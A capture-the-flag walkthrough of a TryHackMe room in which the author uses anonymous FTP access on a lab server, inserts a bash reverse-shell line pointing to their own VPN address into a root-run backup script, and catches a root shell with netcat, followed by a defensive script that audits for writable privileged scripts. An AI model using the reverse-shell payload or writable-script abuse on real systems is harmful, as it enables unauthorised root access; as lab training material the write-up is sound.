Our goal is to recreate an attack that was carried out against a server belonging to The Best Festival Company (TBFC). Let’s start off by running Nmap against the IP.
Alright, we have an FTP server with anonymous login allowed, so we can log in without needing an account! We also have SSH open. Let’s log in to the FTP server using the username anonymous and no password.
We can use ls and cd to move around the directories to look for something interesting.
Looking at the directories, the only one with data in it is the public directory, so let’s take a look in there. This is also the answer to the first question.
Now we need to answer what script gets executed. Looking at what’s in the public directory, you can see a file with the .sh extension, which marks it as a shell script. There’s the answer to question 2.
We can run mget shoppinglist.txt in order to download the file to our machine. Now cat out the file to answer question 3.
NOTE: In the screenshot below I opened another terminal to get the snapshot. You can’t cat out a file within the FTP console.
Now we need to modify the script so that we can get a reverse shell. Start a netcat listener on whatever port you want by running nc -nlvp 1337. Now, in the script, add the line bash -i >& /dev/tcp/10.6.43.108/1337 0>&1. NOTE: The IP address should be your tun0 address from your TryHackMe VPN. Save the script and run mput backup.sh within the FTP terminal to upload it back to the server.
After a few seconds we get a root shell on the tbfc-ftp-01 server!!! Cat out root.txt and submit the final answer for question 4.
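The root cause here is that a script which runs as root sits in a directory anyone can upload to. As an added example (not part of the original room or of TBFC's server), this check flags a script when either the file or its parent directory is writable by group or other; the function names and the fixture paths are hypothetical, and the sample files are constructed in a temporary directory.

```shell
#!/bin/sh
# Added example: audit scripts run by privileged jobs for the weakness above.

# True when group or other holds write permission on path $1.
loosely_writable() {
    perm=$(ls -ld -- "$1" 2>/dev/null | cut -c1-10)
    case "$perm" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# Print one finding per problem for script path $1; print nothing if clean.
audit_script() {
    if loosely_writable "$1"; then
        echo "FILE-WRITABLE $1"
    fi
    # A writable parent directory lets the file be replaced even when the
    # file's own mode is strict.
    if loosely_writable "$(dirname -- "$1")"; then
        echo "DIR-WRITABLE $1"
    fi
    return 0
}

# Constructed fixture: a script inside an open upload directory (as on the
# target) next to a script in a directory only its owner can write to.
make_fixture() {
    root=$(mktemp -d) || return 1
    mkdir "$root/public" "$root/opt"
    printf '#!/bin/sh\n' > "$root/public/backup.sh"
    printf '#!/bin/sh\n' > "$root/opt/backup.sh"
    chmod 777 "$root/public" "$root/public/backup.sh"
    chmod 755 "$root/opt" "$root/opt/backup.sh"
    echo "$root"
}

# Demo run: the first script yields two findings, the second none.
fixture=$(make_fixture)
audit_script "$fixture/public/backup.sh"
audit_script "$fixture/opt/backup.sh"
rm -rf "$fixture"
```

On a real host you would feed audit_script every path referenced by root's scheduled jobs and service units; any finding means a non-root user can change what root executes.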